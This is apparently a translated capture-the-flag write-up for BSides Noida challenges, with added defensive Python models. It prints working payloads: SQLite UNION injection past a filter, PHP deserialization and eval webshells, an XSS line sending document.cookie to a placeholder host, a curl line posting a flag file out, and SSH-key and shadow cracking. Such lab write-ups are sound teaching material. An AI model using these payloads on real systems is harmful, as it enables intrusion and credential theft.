Contest URL: https://ctf.bsidesnoida.in/challs
web
Baby Web
Challenge description: Link, Sauce
Looking at the index.php file from the attachment, these statements are related to the SQL query.
Set the id to empty: chall_id=
Querying gives an error:
```text
Warning: SQLite3::query(): Unable to prepare statement: 1, incomplete input in /www/index.php on line 140
Fatal error: Uncaught Error: Call to a member function fetchArray() on bool in /www/index.php:141
Stack trace:
#0 {main}
  thrown in /www/index.php on line 141
```
So it is a SQLite database. Testing shows the parameter can only be numeric; entering letters or symbols redirects to error.html.
Looking at ctf.conf, there are some regular expressions that filter letters and spaces 👇
```nginx
if ($args ~ [%]) {
    return 500;
}
if ($arg_chall_id ~ [A-Za-z_.%]) {
    return 500;
}
```
① Parameter pollution can be used to bypass the WAF here:
```text
/?chall_id=1&chall_id=a
```
An error is shown, so the method works. From the page source we learn there are 6 columns.
```text
//payload1:
/?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,sql/**/FROM/**/sqlite_master
```
This gives the name of the flag table.
```text
//payload2:
/?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,flag/**/FROM/**/flagsss
```
This gives the flag:
BSNoida{4_v3ry_w4rm_w31c0m3_2_bs1d35_n01d4}
② Bypass using PHP's query-string parsing behaviour
We know that PHP converts the query string (in the URL or body) into the internal associative arrays $_GET or $_POST. For example, /?foo=bar becomes Array([foo] => "bar"). Notably, while parsing the query string PHP deletes certain characters or replaces them with underscores. For example, /?%20news[id%00=42 is converted to Array([news_id] => 42). If an IDS/IPS or WAF has a rule that blocks the request when the value of the news_id parameter is non-numeric, we can bypass it with the following:
```text
/news.php?%20news[id%00=42"+AND+1=0--
```
The value of the parameter %20news[id%00 above is stored in $_GET["news_id"].
PHP needs to turn every parameter into a valid variable name, so when parsing the query string it does two things:
1. Removes whitespace
2. Converts certain characters to underscores (including spaces)
The %20 and %00 are not strictly required.
| User input | Decoded | PHP variable name |
| --- | --- | --- |
| %20foo_bar%00 | foo_bar | foo_bar |
| foo%20bar%00 | foo bar | foo_bar |
| foo%5bbar | foo[bar | foo_bar |

Also, no parameter may contain %, and since spaces are filtered they can be replaced with comment sequences (/**/).
There are 6 columns:
```text
http://ctf.babyweb.bsidesnoida.in/?chall[id=1/**/order/**/by/**/6
```
SQLite queries:
```sql
sqlite> select tbl_name from sqlite_master where type='table';
sqlite> select sql from sqlite_master where type='table';
```
Finding table names:
```text
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/tbl_name/**/from/**/sqlite_master/**/limit/**/0,1),4,5,6
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/tbl_name/**/from/**/sqlite_master/**/limit/**/1,1),4,5,6
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/tbl_name/**/from/**/sqlite_master/**/limit/**/2,1),4,5,6
```
Finding columns:
```text
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/sql/**/from/**/sqlite_master/**/limit/**/2,1),4,5,6
```
In fact the table-name lookups above are not needed; the result is echoed here just the same.
```text
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/flag/**/from/**/flagsss),4,5,6
```
BSNoida{4_v3ry_w4rm_w31c0m3_2_bs1d35_n01d4}
About HTTP Parameter Pollution
Concept: HTTP Parameter Pollution (HPP) simply means assigning a value to the same parameter two or more times. Because the current HTTP standards do not say how multiple values for one parameter should be handled, and different back ends handle it differently, this leads to parsing discrepancies.
| Website | Parameters sent | Parameter accepted |
| --- | --- | --- |
| Baidu | ?wd=1&wd=2 | first |
| Google | ?q=a&q=b | all, in order (a b) |
| Bing | ?q=1&q=2 | second |

| Web server | Parameter retrieval function | Parameters obtained |
| --- | --- | --- |
| PHP/Apache | $_GET("par") | Last |
| JSP/Tomcat | Request.getParameter("par") | First |
| Perl(CGI)/Apache | Param("par") | First |
| Python/Apache | getvalue("par") | All (List) |
| ASP/IIS | Request.QueryString("par") | All (comma-delimited string) |
Causes and exploitation:
HPP vulnerabilities arise partly from differences in server-side handling and partly from flaws in the developers' back-end validation logic. The actual risk of HTTP parameter pollution depends on what the back end does with the parameter and where the polluted parameter is submitted. Broadly, HPP has two usage scenarios:
- logic flaws, which usually lead to IDOR, information disclosure, privilege escalation and similar issues;
- as a helper for other vulnerabilities, to bypass vulnerability detection, WAFs and so on.
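As an added example (not part of the original write-up), the Python below models the three behaviours the two Baby Web bypasses and the tables above rely on: PHP's normalisation of query-string names, nginx's $arg_ variable seeing only the first occurrence of a parameter while PHP's $_GET keeps the last, and the two rules from ctf.conf. The function names (php_variable_name, nginx_arg, waf_blocks, php_get, app_accepts) are mine, and php_variable_name is a simplified model of PHP's php_register_variable_ex() (one unmatched bracket, no nested arrays). The defensive point is app_accepts: validate the value where it is consumed, after the framework has parsed it, instead of pattern-matching the raw request in front of it.

```python
import re
from urllib.parse import unquote_plus


def php_variable_name(raw_name: str) -> str:
    """Simplified model of how PHP turns a query-string key into a $_GET key."""
    name = unquote_plus(raw_name)
    name = name.lstrip(" ")                      # leading spaces are skipped
    name = name.split("\x00", 1)[0]              # the C loop stops at a NUL byte
    head, bracket, tail = name.partition("[")
    head = head.replace(" ", "_").replace(".", "_")   # before any '[': space/dot -> '_'
    if not bracket or "]" in tail:
        return head                              # plain name, or a real array index (base name is the key)
    # '[' with no closing ']' is "not an array": it and any later space/dot/'[' become '_'
    return head + "_" + re.sub(r"[ .\[]", "_", tail)


def nginx_arg(query: str, name: str) -> str:
    """$arg_<name> in nginx: the value of the first pair whose raw key is exactly <name>."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return ""


NGINX_RULE = re.compile(r"[A-Za-z_.%]")          # the character class from ctf.conf


def waf_blocks(query: str) -> bool:
    """The two ctf.conf rules: any '%' in $args, or a letter/_/./% in $arg_chall_id."""
    return "%" in query or NGINX_RULE.search(nginx_arg(query, "chall_id")) is not None


def php_get(query: str) -> dict:
    """What $_GET ends up holding: keys normalised by PHP, the last duplicate wins."""
    result = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        result[php_variable_name(key)] = unquote_plus(value)
    return result


def app_accepts(query: str) -> bool:
    """Hardened check, done where the value is used: validate what PHP actually
    parsed and accept only an unsigned integer id (then bind it in a prepared
    SQLite statement rather than concatenating it into the query)."""
    return php_get(query).get("chall_id", "").isdigit()


if __name__ == "__main__":
    # constructed sample queries: the page's two bypasses and a benign request
    for q in ("chall_id=1", "chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL",
              "chall[id=1/**/order/**/by/**/6", "chall_id=a"):
        print(f"{q!r}: waf_blocks={waf_blocks(q)} php_get={php_get(q)} app_accepts={app_accepts(q)}")
```

Both bypasses pass waf_blocks (the first because nginx inspects only the first chall_id, the second because no raw key named chall_id exists at all), yet both fail app_accepts, because the check runs on the same value PHP hands to the query.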
HTTP Parameter Pollution (HPP): reference link 1, reference link 2
Bypass using PHP's string parsing behaviour: reference link
wowooo
```php
<?php
include 'flag.php';
function filter($string){
    $filter = '/flag/i';
    return preg_replace($filter,'flagcc',$string);
}
$username=$_GET['name'];
$pass="V13tN4m_number_one";
$pass="Fl4g_in_V13tN4m";
$ser='a:2:{i:0;s:'.strlen($username).":\"$username\";i:1;s:".strlen($pass).":\"$pass\";}";
$authen = unserialize(filter($ser));
if($authen[1]==="V13tN4m_number_one "){
    echo $flag;
}
if (!isset($_GET['debug'])) {
    echo("PLSSS DONT HACK ME!!!!!!").PHP_EOL;
} else {
    highlight_file( __FILE__);
}
?>
<!-- debug -->
```
Key point: deserialization escape (the filter lengthens the string after it has been serialized)
```text
flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}}}
```
BSNoida{3z_ch4all_46481684185_!!!!!!@!}
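An added Python model (not part of the write-up) of why the filter-after-serialize order in wowooo is exploitable and what the safe order looks like. php_serialize_list and php_unserialize are a minimal writer/reader for the a:N:{i:k;s:n:"...";} subset used here, written for this example; like PHP's unserialize() the reader stops after the first complete value, and it returns the unread tail so a defender can log it as a tamper indicator. PAYLOAD is the payload quoted above; PASS is the hard-coded password from the challenge source.

```python
import re

PASS = "Fl4g_in_V13tN4m"                      # the effective $pass from the page
FLAG_FILTER = re.compile("flag", re.IGNORECASE)
PAYLOAD = "flag" * 18 + '";i:1;s:19:"V13tN4m_number_one ";}}}'   # the page's payload


def php_serialize_list(values):
    """Same a:N:{i:k;s:len:"...";} string the page's $ser line builds.
    PHP's s:N is a byte count, so lengths come from the UTF-8 encoding."""
    body = "".join(f'i:{i};s:{len(v.encode())}:"{v}";' for i, v in enumerate(values))
    return f"a:{len(values)}:{{{body}}}"


def _read(buf: bytes, pos: int):
    """Parse one value (int, string or array) starting at buf[pos]; return (value, next_pos)."""
    tag = buf[pos:pos + 1]
    if tag == b"i":
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    if tag == b"s":
        colon = buf.index(b":", pos + 2)
        n = int(buf[pos + 2:colon])
        start = colon + 2                                     # skip ':"'
        if buf[colon + 1:colon + 2] != b'"' or buf[start + n:start + n + 2] != b'";':
            raise ValueError(f"declared length {n} does not match the data at offset {pos}")
        return buf[start:start + n].decode(), start + n + 2
    if tag == b"a":
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        pos = colon + 2                                       # skip ':{'
        items = {}
        for _ in range(count):
            key, pos = _read(buf, pos)
            items[key], pos = _read(buf, pos)
        if buf[pos:pos + 1] != b"}":
            raise ValueError("unterminated array")
        return items, pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def php_unserialize(data: str):
    """Minimal unserialize() for that subset: stops after the first complete
    value, like PHP, and hands back whatever was left unread."""
    buf = data.encode()
    value, pos = _read(buf, 0)
    return value, buf[pos:].decode(errors="replace")


def vulnerable_login(username: str):
    """The page's order: serialize first, then run a filter that changes lengths."""
    return php_unserialize(FLAG_FILTER.sub("flagcc", php_serialize_list([username, PASS])))


def hardened_login(username: str):
    """Filter (or reject) the untrusted value before serializing, so every s:N
    is computed over the bytes that will actually be parsed."""
    return php_unserialize(php_serialize_list([FLAG_FILTER.sub("flagcc", username), PASS]))


if __name__ == "__main__":
    for login in (vulnerable_login, hardened_login):
        value, leftover = login(PAYLOAD)
        print(login.__name__, "->", value[1], "| unread tail:", repr(leftover))
```

With the vulnerable order each "flag" grows by two bytes, the declared s:108 swallows exactly the 18 "flagcc" tokens, and the attacker-supplied ";i:1;s:19:..." becomes the second element while the real password is left in the unread tail. With the hardened order the length is recomputed after filtering, so the whole payload stays inside element 0 and nothing is left over; a non-empty tail is a cheap thing to alert on.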
freepoint
```php
<?php
include "config.php";
function filter($str) {
    if (preg_match("/system|exec|passthru|shell_exec|pcntl_exec|bin2hex|popen|scandir|hex2bin|[~$.^_`]|\'[a-z]|\"[a-z0-9]/i", $str)) {
        return false;
    } else {
        return true;
    }
}
class BSides {
    protected $option;
    protected $name;
    protected $note;
    function __construct() {
        $option = "no flag";
        $name = "guest";
        $note = "flag{flag_phake}";
        $this->load();
    }
    public function load() {
        if ($this->option === "no flag") {
            die("flag here ! :)");
        } else if ($this->option === "getFlag") {
            $this->loadFlag();
        } else {
            die("You don't need flag ?");
        }
    }
    private function loadFlag() {
        if (isset($this->note) && isset($this->name)) {
            if ($this->name === "admin") {
                if (filter($this->note) == 1) {
                    eval($this->note.";");
                } else {
                    die("18cm30p !! :< ");
                }
            }
        }
    }
    function __destruct() {
        $this->load();
    }
}
if (isset($_GET['ctf'])) {
    $ctf = (string)$_GET['ctf'];
    if (check($ctf)) {
        unserialize($ctf);
    }
} else {
    highlight_file(__FILE__);
}
?>
```
The regex above only blocks a quote that is directly followed by a letter or digit.
```php
<?php
class BSides {
    public $option = "getFlag";
    public $name = "admin";
    public $note = 'eval(urldecode("%70%68%70%69%6e%66%6f%28%29%3b"))';
}
$a = new BSides();
echo urlencode(serialize($a));
```
```php
<?php
class BSides {
    public $option = "getFlag";
    public $name = "admin";
    public $note = "eval(strrev(\";))'02478747e2878787f556e6f57643c666f256d6f686f202471636'(nib2xeh(metsys\"));";
}
$a = new BSides();
echo urlencode(serialize($a));
?>
```
BSNoida{Fre3_fl4g_f04_y0u_@@55361988!!!}
Basic Notepad
After registering and logging in there is a message board: classic XSS.
Capturing the request, the msg parameter is sent via POST and there is an auth value in the cookie.
Trying to pop an alert, the input is escaped directly and nothing executes.
You can see 👇
```text
Content-Security-Policy: script-src 'none'; object-src 'none'; base-uri 'none'; script-src-elem 'none';report-url /report/8ABSA8rH61-14U3dfGOfog
```
Append ; script-src-attr 'unsafe-inline' to the end of the token.
After that, window.location can be used to bypass it.
```html
<img src=# onerror=alert(1)>
```
Add the URL-encoded ; script-src-attr 'unsafe-inline' at the token.
The alert pops.
```html
// exfiltrate the cookie
<img src=# onerror='fetch("http://xxxx:8000/?cookie=" + encodeURI(document.cookie))'>
```
Listen on port 8000.
The cookie obtained is YWRtaW46djNyeTUzY3IzdFA0c3N3MHJkZGRk
base64-decoding it gives admin:v3ry53cr3tP4ssw0rdddd
Replace the cookie and go in to see the flag.
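Added example, not from the write-up: a small Python policy builder and checker showing why letting user-influenced data reach the report path of the Content-Security-Policy header is enough to neutralise the policy, and how to close it. PAGE_HEADER is the header quoted above; INJECTED_TOKEN is the token with the directive appended as described. The builder uses the standard directive name report-uri rather than the page's report-url, and parse_csp / inline_handlers_allowed are simplified (nonce and hash overrides are ignored). All function names are mine.

```python
import re

TOKEN_RE = re.compile(r"[A-Za-z0-9_-]+")
BASE_POLICY = "script-src 'none'; object-src 'none'; base-uri 'none'; script-src-elem 'none'"

# constructed inputs: the header quoted on the page and the injected report token
PAGE_HEADER = ("script-src 'none'; object-src 'none'; base-uri 'none'; "
               "script-src-elem 'none';report-url /report/8ABSA8rH61-14U3dfGOfog")
INJECTED_TOKEN = "8ABSA8rH61-14U3dfGOfog; script-src-attr 'unsafe-inline'"


def naive_csp(report_token: str) -> str:
    """Plain concatenation, as the page's server appears to do: whatever is in
    the token lands in the header, directive separators included."""
    return BASE_POLICY + "; report-uri /report/" + report_token


def token_is_safe(report_token: str) -> bool:
    """Allow-list the only caller-influenced piece of the header."""
    return TOKEN_RE.fullmatch(report_token) is not None


def build_csp(report_token: str) -> str:
    """Hardened builder: reject anything that is not a bare token before it is
    interpolated, so no ';' or extra directive can be smuggled in."""
    if not token_is_safe(report_token):
        raise ValueError("report token must match [A-Za-z0-9_-]+")
    return naive_csp(report_token)


def parse_csp(header: str) -> dict:
    """{directive: [source expressions]}. A directive that appears a second
    time is ignored, matching how browsers treat duplicates."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def inline_handlers_allowed(header: str) -> bool:
    """Would an injected onerror=/onclick= handler run under this policy?
    script-src-attr governs attribute handlers and falls back to script-src."""
    policy = parse_csp(header)
    sources = policy.get("script-src-attr", policy.get("script-src", []))
    return "'unsafe-inline'" in [s.lower() for s in sources]


if __name__ == "__main__":
    print("page header allows handlers:", inline_handlers_allowed(PAGE_HEADER))
    print("naive builder with injected token:", inline_handlers_allowed(naive_csp(INJECTED_TOKEN)))
    print("hardened builder accepts injected token:", token_is_safe(INJECTED_TOKEN))
```

Because script-src-attr is absent from the original header, attribute handlers inherit script-src 'none'; the injected token adds a script-src-attr that is not a duplicate of anything, so browsers honour it and the img onerror payload runs. The fix is not in the parser but in build_csp: the report path is the only variable part, so it is validated as an opaque token.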
Calculate
```php
<?php
error_reporting(0);
include "config.php";
if (isset($_POST['VietNam'])) {
    $VN = $_POST['VietNam'];
    if (filter($VN)) {
        die("nope!!");
    }
    if (!is_string($VN) || strlen($VN) > 110) {
        die("18cm30p ??? =)))");
    } else {
        $VN = "echo ".$VN.";";
        eval($VN);
    }
} else {
    if (isset($_GET['check'])) {
        echo phpinfo();
    } else {
        highlight_file(__FILE__);
    }
}
?>
```
Looking at phpinfo shows that a large number of functions are disabled; fuzzing shows exec is not filtered.
```php
<?php
if (isset($_GET['🐶'])) {
    highlight_file(__FILE__);
}
function filter($payload) {
    if (preg_match("/[a-zA-BD-Z!@#%^&*:'\"|`~\\\\]|3|5|6|9/", $payload)) {
        return true;
    }
}
?>
<!-- ?🐶 -->
```
Letters and digits are filtered, so invisible characters could be considered, but bitwise operators and negation are filtered too. Parentheses are not filtered, so functions can be called, and $, +, =, uppercase C, underscore and the digits 1 and 2 are also allowed, so we can construct a webshell with the increment operator.
```php
<?php
$_=C;$_++;$_++;$__=$_;
$_++;$_++;
$___=$_;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$_=_.$___.$__.$_;
${$_}{1}(${$_}{2});
```
```php
$_=C;$_++;$_++;$__=$_;$_++;$_++;$___=$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_++;$_=_.$___.$__.$_;${$_}{1}(${$_}{2})
```
This exceeds the length limit, so PHP's NAN is constructed to obtain an N, which is then incremented to get T:
```php
<?php
$_=C;$_++;$C=++$_;$_++;$_++;$C_=$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;${$_}{1}(${$_}{2});
```
URL-encoded form of the payload for the VietNam parameter, with 1=exec and 2=curl ... passed as GET parameters:
```text
%24_%3DC%3B%24_%2B%2B%3B%24C%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24C_%3D%24_%3B%24_%3D%28C%2FC.C%29%5B0%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24C_.%24C.%2B%2B%24_%3B%24%7B%24_%7D%7B1%7D%28%24%7B%24_%7D%7B2%7D%29%3B
1=exec&2=curl xxx.xxx.xxx.xxx:xxx -d "`cat /home/fl4g_h1hih1i_xxx.txt`"
```
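As an added analyst aid (not part of the write-up), the Python below implements PHP's string increment and a tiny static evaluator for the restricted statement shapes these payloads use, so a reviewer who meets an obfuscated $_++ chain in a log or a dropped file can resolve what it calls without executing it. It supports only what appears on this page: a bare constant C, $x++, ++$x, assignment, dot-concatenation, the (C/C.C)[0] trick for "N", and the final ${$x}{i}(${$x}{j}) call. php_increment and resolve_increment_chain are my names; the three SNIPPET constants are the page's own payloads.

```python
import re

# constructed inputs: the three payload variants shown above
SNIPPET1 = ("$_=C;$_++;$_++;$__=$_;$_++;$_++;$___=$_;" + "$_++;" * 13
            + "$_=_.$___.$__.$_;${$_}{1}(${$_}{2});")
SNIPPET2 = ("$_=C;$_++;$_++;$__=$_;$_++;$_++;$___=$_;$_=(C/C.C)[0];" + "$_++;" * 6
            + "$_=_.$___.$__.$_;${$_}{1}(${$_}{2})")
SNIPPET3 = ("<?php $_=C;$_++;$C=++$_;$_++;$_++;$C_=$_;$_=(C/C.C)[0];" + "$_++;" * 5
            + "$_=_.$C_.$C.++$_;${$_}{1}(${$_}{2});")


def php_increment(value: str) -> str:
    """PHP's ++ on a non-numeric string: Perl-style alphanumeric increment
    with carry ('Z' -> 'AA', 'z' -> 'aa', 'Az' -> 'Ba'). Purely numeric
    strings, which PHP would treat as numbers, are not modelled."""
    chars = list(value)
    i = len(chars) - 1
    while i >= 0:
        c = chars[i]
        if c in "Zz9":
            chars[i] = {"Z": "A", "z": "a", "9": "0"}[c]
            i -= 1                                   # carry into the next position
        else:
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)
    # carried past the first character: PHP prepends one of the same class
    return {"A": "A", "a": "a", "0": "1"}[chars[0]] + "".join(chars)


def _term(env: dict, term: str) -> str:
    """Evaluate one operand of the restricted grammar."""
    if term == "C":
        return "C"                     # undefined constant C -> the string "C"
    if term == "_":
        return "_"
    if term == "(C/C.C)[0]":
        return "N"                     # "C"/"C" is 0/0 -> NAN; NAN."C" = "NANC"; [0] -> "N"
    if term.startswith("++$"):
        env[term[3:]] = php_increment(env[term[3:]])
        return env[term[3:]]
    if term.startswith("$"):
        return env[term[1:]]
    raise ValueError("unsupported term: " + term)


def resolve_increment_chain(code: str) -> str:
    """Walk the statements and return what the final variable-function call
    resolves to, e.g. '$_GET[1]($_GET[2])'."""
    env = {}
    code = re.sub(r"\s+", "", code).replace("<?php", "")
    for stmt in filter(None, code.split(";")):
        if m := re.fullmatch(r"\$(\w+)\+\+", stmt):                       # $x++
            env[m[1]] = php_increment(env[m[1]])
        elif m := re.fullmatch(r"\$(\w+)=(.+)", stmt):                     # $x = a.b.c
            rhs = m[2]
            terms = [rhs] if rhs == "(C/C.C)[0]" else rhs.split(".")
            env[m[1]] = "".join(_term(env, t) for t in terms)              # left to right, so ++$x applies in order
        elif m := re.fullmatch(r"\$\{\$(\w+)\}\{(\d+)\}\(\$\{\$(\w+)\}\{(\d+)\}\)", stmt):
            return f"${env[m[1]]}[{m[2]}](${env[m[3]]}[{m[4]}])"
        else:
            raise ValueError("unsupported statement: " + stmt)
    raise ValueError("no variable-function call found")


if __name__ == "__main__":
    for snippet in (SNIPPET1, SNIPPET2, SNIPPET3):
        print(len(re.sub(r"\s+", "", snippet).replace("<?php", "")), "bytes ->",
              resolve_increment_chain(snippet))
```

All three variants resolve to the same call through $_GET, which is the thing worth alerting on: a request body that is nothing but C, $, _, + and = characters and resolves to a variable function call is a webshell regardless of how the letters were obtained.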
misc
Farewell
Challenge description: chall link
Just assemble the jigsaw puzzle.
Psst
Challenge description: chall file
The attachment is an archive nested 70 layers deep... I was completely numb.
After extracting, the files beyond layer 31 could not be displayed, and an extra folder named "security." appeared that could not be deleted no matter what... truly **stupid; in the end I got rid of it with WinRAR's "compress and delete original files".
I tried writing a script without success, so I did it all by hand. I could have taken third blood, but two characters were in the wrong order... no idea how I managed that.
My Artwork
Challenge description: chall link
The gist is that a picture was drawn with code; combined with the attachment name art.TURTLE, "turtle" brings to mind Python's turtle graphics. Online site: click here.
```logo
TO SPAWN_FLAG
PRINT [GET A CUP OF COFFEE AND ENJOY...]
PRINT [DRAWING THE FLAG FOR YOU...]
PRINT [LOOK AT THE SCREEN...]
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 200 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 10000 [FD 200 RT 90 FD 200 RT 90 FD 200+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50 BK 250 LT 90 FD 200 RT 90 FD 250-REPCOUNT/1000000 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
PRINT [KEEP LOOKING...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
REPEAT 10000 [FD 200 LT 90 FD 50-REPCOUNT/1000000 BK 100 FD 50 LT 90 FD 200+REPCOUNT/1000000 RT 90 FD 50 BK 100 FD 50 RT 90]
CS
REPEAT 10000 [RT 90 FD 200 LT 90 FD 100 LT 90 FD 200 RT 90 FD 100 RT 90 FD 200 BK 200-REPCOUNT/1000000 RT 90 FD 100 LT 90 FD 200 RT 90 FD 100+REPCOUNT/1000000 RT 90 FD 200 RT 90]
CS
PRINT [LOOK AT THE SCREEN...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
PRINT [KEEP LOOKING...]
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50-REPCOUNT/1000000 BK 250 LT 90 FD 100 RT 90 FD 200 BK 200 LT 90 FD 100 RT 90 FD 250 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 600 [RT 35 FD 200 RT 110 FD 100 RT 125 FD 115 BK 115+REPCOUNT/1000000 LT 125 FD 100+REPCOUNT/1000000 BK 200 RT 70 FD 200 RT 145]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 BK 200 RT 90 FD 200+REPCOUNT/1000000 LT 90 FD 200 BK 200 LT 90 FD 200 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 100 BK 200+REPCOUNT/1000000 FD 100 LT 90 FD 200 RT 180]
CS
REPEAT 10000 [FD 100 LT 35 FD 100 BK 100+REPCOUNT/1000000 RT 70 FD 100 BK 100 RT 145 FD 100-REPCOUNT/1000000 RT 180]
CS
PRINT [LOOK AT THE SCREEN...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50-REPCOUNT/1000000 BK 250 LT 90 FD 100 RT 90 FD 200 BK 200 LT 90 FD 100 RT 90 FD 250 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 600 [RT 35 FD 200 RT 110 FD 100 RT 125 FD 115 BK 115+REPCOUNT/1000000 LT 125 FD 100+REPCOUNT/1000000 BK 200 RT 70 FD 200 RT 145]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 BK 200 RT 90 FD 200+REPCOUNT/1000000 LT 90 FD 200 BK 200 LT 90 FD 200 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 100 BK 200+REPCOUNT/1000000 FD 100 LT 90 FD 200 RT 180]
CS
REPEAT 10000 [FD 100 LT 35 FD 100 BK 100+REPCOUNT/1000000 RT 70 FD 100 BK 100 RT 145 FD 100-REPCOUNT/1000000 RT 180]
CS
PRINT [WAIT FOR IT...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REP COUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
PRINT [WAIT FOR IT...]
REPEAT 10000 [FD 200 LT 90 FD 50-REPCOUNT/1000000 BK 100 FD 50 LT 90 FD 200+REPCOUNT/1000000 RT 90 FD 50 BK 100 FD 50 RT 90]
CS
REPEAT 10000 [RT 90 FD 200 LT 90 FD 100 LT 90 FD 200 RT 90 FD 100 RT 90 FD 200 BK 200-REPCOUNT/1000000 RT 90 FD 100 LT 90 FD 200 RT 90 FD 100+REPCOUNT/1000000 RT 90 FD 200 RT 90]
CS
PRINT [WAIT FOR IT...]
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 200 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 10000 [FD 200 RT 90 FD 200 RT 90 FD 200+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50 BK 250 LT 90 FD 200 RT 90 FD 250-REPCOUNT/1000000 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
PRINT [TADAAAAA!!!]
END
```
Each REPEAT line draws one character; joined together they form the flag.
```text
CODE_IS_BEAUTY_BEAUTY_IS_CODE
BSNoida{CODE_IS_BEAUTY_BEAUTY_IS_CODE}
```
Death Note
Challenge description: chall link
Since the corresponding room has been closed, I record the approaches of the strong players here.
1.
nmap shows only ports 22 and 80 open.
Directory scanning with the provided wordlist found 👇
```text
index.html    [Status: 200, Size: 4173, Words: 1633, Lines: 104]
s3cr3t        [Status: 200, Size: 63, Words: 12, Lines: 2]
robots.txt    [Status: 200, Size: 17, Words: 3, Lines: 2]
ryuk.apples   [Status: 200, Size: 1766, Words: 9, Lines: 31]
robots.txt    [Status: 200, Size: 17, Words: 3, Lines: 2]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [4614/4614] :: Job [1/1] :: 148 req/sec :: Duration: [0:00:31] :: Errors: 0 ::
```
ryuk.apples contains an SSH private key.
Crack it with ssh2john and the provided wordlist:
```shell
# corresponding commands
ssh2john id > id_hash
john -w=wordlist.txt id_hash
```
This gives the passphrase.
After logging in, passwd and shadow are found.
Crack those next:
```shell
# commands
unshadow passwd shadow > user_hashes
john -w=wordlist.txt user_hashes
```
This gives the password of the light user.
Then escalate privileges and cat the flag:
```shell
sudo -l
sudo cat /root/root.txt
```
2.
A port scan first shows only 22 and 80.
Then Gobuster is used for directories:
```text
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.4.58/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                wordlist.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
2021/08/08 02:35:45 Starting gobuster in directory enumeration mode
===============================================================
/.hta.txt             (Status: 403) [Size: 275]
